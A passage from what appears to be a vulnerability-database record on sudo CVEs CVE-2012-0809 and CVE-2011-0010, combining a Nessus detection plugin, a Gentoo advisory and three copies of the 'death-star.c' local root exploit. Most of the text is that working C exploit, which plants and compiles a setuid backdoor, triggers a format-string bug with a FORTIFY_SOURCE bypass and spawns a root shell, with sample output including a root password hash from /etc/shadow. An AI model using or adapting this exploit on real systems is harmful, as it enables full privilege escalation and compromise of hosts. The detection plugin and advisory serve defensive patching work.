"CVE-2011-0010"], "modified": "2012-03-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:sudo"], "id": "GENTOO_GLSA-201203-06.NASL", "href": "https://www.tenable.com/plugins/nessus/58216", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-06.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58216);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0010\", \"CVE-2012-0809\");\n script_bugtraq_id(45774, 51719);\n script_xref(name:\"GLSA\", value:\"201203-06\");\n\n script_name(english:\"GLSA-201203-06 : sudo: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-06\n(sudo: Privilege escalation)\n\n Two vulnerabilities have been discovered in sudo:\n When the sudoers file is configured with a Runas group, sudo does not\n prompt for a password when changing to the new group (CVE-2011-0010).\n A format string vulnerability exists in the 'sudo_debug()' function\n (CVE-2012-0809).\n \nImpact :\n\n A local attacker could possibly gain the ability to run arbitrary\n commands with the privileges of other users or groups, including root.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All sudo users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/sudo-1.8.3_p2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/sudo\", unaffected:make_list(\"ge 1.8.3_p2\", \"rge 1.7.4_p5\"), vulnerable:make_list(\"lt 1.8.3_p2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-15T19:11:18", "description": "sudo versions 1.8.0 through 1.8.3p1 sudo_debug root exploit with glibc FORTIFY_SOURCE bypass.", "edition": 2, "published": "2013-05-01T00:00:00", "type": "zdt", "title": "Sudo v1.8.0-1.8.3p1 (sudo_debug) - Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "1337DAY-ID-20717", "href": "https://0day.today/exploit/description/20717", "sourceData": "#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n \r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n \r\n/* files that we create on disk */\r\n#define BACKDOOR \"e.c\"\r\n#define BD_COMPILED \"e\"\r\n#define SUDO_ASKPASS \"e.sh\"\r\n \r\nextern char **environ;\r\nstruct utsname ver;\r\n \r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n \r\n/* hardcoded path to sudo */\r\nconst char sudo[] = \"/usr/bin/sudo\\0\";\r\nchar s_version[20];\r\n \r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {\"1.8.0\"},\r\n {\"1.8.1\"},\r\n {\"1.8.2\"},\r\n {\"1.8.3\"}\r\n};\r\n \r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {\"2.14.90\"},\r\n};\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(\"[+] Targeting release: %s\\n\", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(\"[+] Press enter when ready...\");\r\n scanf(\"%c\", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n \r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n \r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf(\"[-] An error occurred while forking sudo\\n\");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n \r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n \r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n \r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n \r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,\"w\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n \r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n \r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n \r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n \r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n \r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n \r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n \r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20717"}], "gentoo": [{"lastseen": "2016-09-06T19:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809", "CVE-2011-0010"], "edition": 1, "description": "### Background\n\nsudo allows a system administrator to give users the ability to run commands as other users. \n\n### Description\n\nTwo vulnerabilities have been discovered in sudo:\n\n * When the sudoers file is configured with a Runas group, sudo does not prompt for a password when changing to the new group (CVE-2011-0010). \n * A format string vulnerability exists in the \"sudo_debug()\" function (CVE-2012-0809). \n\n### Impact\n\nA local attacker could possibly gain the ability to run arbitrary commands with the privileges of other users or groups, including root. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.8.3_p2\"", "modified": "2012-03-06T00:00:00", "published": "2012-03-06T00:00:00", "id": "GLSA-201203-06", "href": "https://security.gentoo.org/glsa/201203-06", "type": "gentoo", "title": "sudo: Privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:43:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0809", "CVE-2012-0864"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78801", "id": "SSV:78801", "sourceData": "\n /*\r\n death-star.c\r\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\r\n by aeon - http://infosecabsurdity.wordpress.com/\r\n\r\n This PoC exploits:\r\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow\r\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string\r\n \r\n Tested on:\r\n - Fedora core 16 verne\r\n - glibc 2.14.90.14 release\r\n - sudo 1.8.1p2\r\n \r\n Notes:\r\n - This exploit actually turned out very reliable :-) \r\n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\r\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\r\n\r\n References and thanks too:\r\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\r\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\r\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\r\n - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\r\n\r\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\r\n[aeon@localhost tmp]$ ./death-star \r\n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\r\n[+] Found vuln glibc version: 2.14.90\r\n[+] Found a vuln sudo version: 1.8.1\r\n[+] Writing backdoor: e.c\r\n[+] Compiling backdoor: e\r\n[+] Writing SUDO_ASKPASS file: e.sh\r\n[+] Press enter when ready...\r\n\r\n< -------------- REMOVED -------------->\r\n\r\n A?AF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored.\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: sudo_mode 1081383169\r\nSorry, try again.\r\nSorry, try again.\r\nSorry, try again.\r\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\r\n %1073886251%21372736 %: policy plugin returns 1081402445\r\n[+] Getting root..!\r\n[+] Cleaning system.\r\n[+] Launching root shell!\r\nsh-4.2# id; uname -a\r\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\r\nsh-4.2# head -n1 /etc/shadow\r\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\r\nsh-4.2#\r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n\r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n\r\n/* files that we create on disk */\r\n#define BACKDOOR "e.c"\r\n#define BD_COMPILED "e"\r\n#define SUDO_ASKPASS "e.sh"\r\n\r\nextern char **environ;\r\nstruct utsname ver;\r\n\r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n\r\n/* hardcoded path to sudo */\r\nconst char sudo[] = "/usr/bin/sudo\\0";\r\nchar s_version[20];\r\n\r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {"1.8.0"},\r\n {"1.8.1"},\r\n {"1.8.2"},\r\n {"1.8.3"}\r\n};\r\n\r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {"2.14.90"},\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf("[+] Targeting release: %s\\n", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf("[+] Press enter when ready...");\r\n scanf("%c", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n\r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n\r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf("[-] An error occurred while forking sudo\\n");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n\r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf("[+] Found vuln glibc version: %s\\n", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo);\r\n fp = popen(sudo_ver_cmd, "r");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to get sudo's version\\n[-]Exiting.." );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf("[+] Found a vuln sudo version: %s\\n", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = "#include <stdio.h>\\r\\n"\r\n "#include <stdlib.h>\\r\\n"\r\n "int main(int argc, char **argv){\\r\\n"\r\n " printf(\\"[+] Getting root..!\\\\n\\");\\r\\n"\r\n " setresuid(0,0,0);\\r\\n"\r\n " printf(\\"[+] Cleaning system.\\\\n\\");\\r\\n"\r\n " remove(\\"e\\"); remove(\\"e.c\\"); remove(\\"e.sh\\");\\r\\n"\r\n " printf(\\"[+] Launching root shell!\\\\n\\");\\r\\n"\r\n " system(\\"/bin/sh\\");\\r\\n"\r\n " exit(0);\\r\\n"\r\n "}\\r\\n";\r\n\r\n FILE *fp = fopen(BACKDOOR,"wb");\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing backdoor: %s\\n", BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);\r\n printf("[+] Compiling backdoor: %s\\n", BD_COMPILED);\r\n fp = popen(compile_bd, "r");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to compile the backdoor, check the gcc path\\n" );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,"w");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing SUDO_ASKPASS file: %s\\n", SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = "LD_PRELOAD=";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$";\r\n char *args[] = { fmtstring, "-D9", "-A", "", NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv("LD_PRELOAD");\r\n unsetenv("SUDO_ASKPASS");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78801"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "edition": 1, "published": "2013-05-01T00:00:00", "title": "sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B", "href": "", "sourceData": "/*\n death-star.c\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\n by aeon - http://infosecabsurdity.wordpress.com/\n\n This PoC exploits:\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via \"nargs\" integer overflow\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 \"sudo_debug\" format string\n \n Tested on:\n - Fedora core 16 verne\n - glibc 2.14.90.14 release\n - sudo 1.8.1p2\n \n Notes:\n - This exploit actually turned out very reliable :-) \n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\n\n References and thanks too:\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\n - \"A Eulogy for Format Strings\" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\n\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\n[aeon@localhost tmp]$ ./death-star \n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\n[+] Found vuln glibc version: 2.14.90\n[+] Found a vuln sudo version: 1.8.1\n[+] Writing backdoor: e.c\n[+] Compiling backdoor: e\n[+] Writing SUDO_ASKPASS file: e.sh\n[+] Press enter when ready...\n\n< -------------- REMOVED -------------->\n\n A\ufffd\u001bAF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001f\u0002' from LD_PRELOAD cannot be preloaded: ignored.\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: sudo_mode 1081383169\nSorry, try again.\nSorry, try again.\nSorry, try again.\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\n %1073886251%21372736 %: policy plugin returns 1081402445\n[+] Getting root..!\n[+] Cleaning system.\n[+] Launching root shell!\nsh-4.2# id; uname -a\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\nsh-4.2# head -n1 /etc/shadow\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\nsh-4.2#\n*/\n\n#include <sys/resource.h>\n#include <sys/utsname.h>\n#include <gnu/libc-version.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <sys/time.h>\n#include <sys/stat.h>\n#include <string.h>\n#include <sys/wait.h>\n\n#define OFFSET 65000\n#define NUM_THREADS 0\n\n/* files that we create on disk */\n#define BACKDOOR \"e.c\"\n#define BD_COMPILED \"e\"\n#define SUDO_ASKPASS \"e.sh\"\n\nextern char **environ;\nstruct utsname ver;\n\nvoid *kill_sudo();\nvoid *pop_shell();\nvoid *set_env();\nint is_glibc_vuln();\nint is_sudo_vuln();\nint write_backdoor();\n\n/* hardcoded path to sudo */\nconst char sudo[] = \"/usr/bin/sudo\\0\";\nchar s_version[20];\n\n/* vuln versions of sudo */\nchar vuln_sudo_versions[4][20] = {\n {\"1.8.0\"},\n {\"1.8.1\"},\n {\"1.8.2\"},\n {\"1.8.3\"}\n};\n\n/* vuln versions of glibc */\nchar vuln_glibc_versions[4][20] = {\n {\"2.14.90\"},\n};\n\nint main(int argc, char *argv[])\n{\n struct rlimit rara;\n int status;\n char ready;\n uname(&ver);\n printf(\"[+] Targeting release: %s\\n\", ver.release);\n if (is_glibc_vuln()){\n if(is_sudo_vuln()){\n if (write_backdoor()){\n printf(\"[+] Press enter when ready...\");\n scanf(\"%c\", &ready);\n }else{ exit(0); }\n }else{ exit(0); }\n }else{ exit(0); }\n\n // ulimited stack\n rara.rlim_max = rara.rlim_cur = -1;\n setrlimit(RLIMIT_STACK, &rara);\n\n pid_t pid;\n if((pid = fork()) < 0)\n {\n printf(\"[-] An error occurred while forking sudo\\n\");\n return -1;\n }\n else if(pid == 0){\n set_env();\n kill_sudo();\n }else{\n wait(&status);\n if (WIFEXITED(status)) {\n sleep(1);\n pop_shell();\n }\n }\n}\n\nint is_glibc_vuln(){\n int i, returnval = -1;\n for (i = 0; i < 4; i++){\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint is_sudo_vuln(){\n int i, returnval = -1;;\n FILE *fp;\n char path[20];\n char sudo_ver_cmd[50];\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\n fp = popen(sudo_ver_cmd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\n exit(0);\n }\n fgets(path, 21, fp);\n memmove (s_version, path+13,5);\n for (i = 0; i < 4; i++){\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint write_backdoor(){\n int returnval = 1;\n char askpass[100], compile_bd[100];\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\n \"#include <stdlib.h>\\r\\n\"\n \"int main(int argc, char **argv){\\r\\n\"\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\n \" setresuid(0,0,0);\\r\\n\"\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\n \" system(\\\"/bin/sh\\\");\\r\\n\"\n \" exit(0);\\r\\n\"\n \"}\\r\\n\";\n\n FILE *fp = fopen(BACKDOOR,\"wb\");\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" 